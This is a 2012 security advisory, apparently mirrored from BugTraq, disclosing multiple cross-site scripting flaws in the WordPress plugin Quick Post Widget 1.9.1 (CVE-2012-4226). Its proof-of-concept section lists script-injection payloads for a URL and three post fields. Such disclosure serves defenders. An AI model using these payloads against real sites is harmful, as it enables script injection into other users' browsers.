Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28509
HistorySep 03, 2012 - 12:00 a.m.

WordPress Plugin 'Quick Post Widget' 1.9.1 Multiple Cross-site scripting vulnerabilities

2012-09-0300:00:00
vulners.com
13

Advisory: WordPress Plugin 'Quick Post Widget' 1.9.1 Multiple Cross-site scripting vulnerabilities
Advisory ID: SSCHADV2012-016
Author: Stefan Schurtz
Affected Software: Successfully tested on Quick Post Widget 1.9.1
Vendor URL: http://qpw.famvanakkeren.nl/
Vendor Status: informed
CVE-ID: CVE-2012-4226

==========================
Vulnerability Description

The WordPress plugin Quick Post Widget 1.9.1 is prone to multiple XSS vulnerabilities

==================
PoC-Exploit

// GET
http://[target]/wordpress/?"></script><script>alert(/xss/)</script>

// POST
http://[target]/wordpress/ -> Quickpost 'Title' -> "></script><script>alert(/xss/)</script>
http://[target]/wordpress/ -> Quickpost 'Content' -> "></script><script>alert(/xss/)</script>
http://[target]/wordpress/ -> Quickpost 'New category' -> "></script><script>alert(/xss/)</script>

=========
Solution

====================
Disclosure Timeline

02-Jul-2012 - developer informed
09-Jul-2012 - developer feedback
10-Aug-2012 - post on BugTraq

========
Credits

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References

http://www.darksecurity.de/advisories/2012/SSCHADV2012-016.txt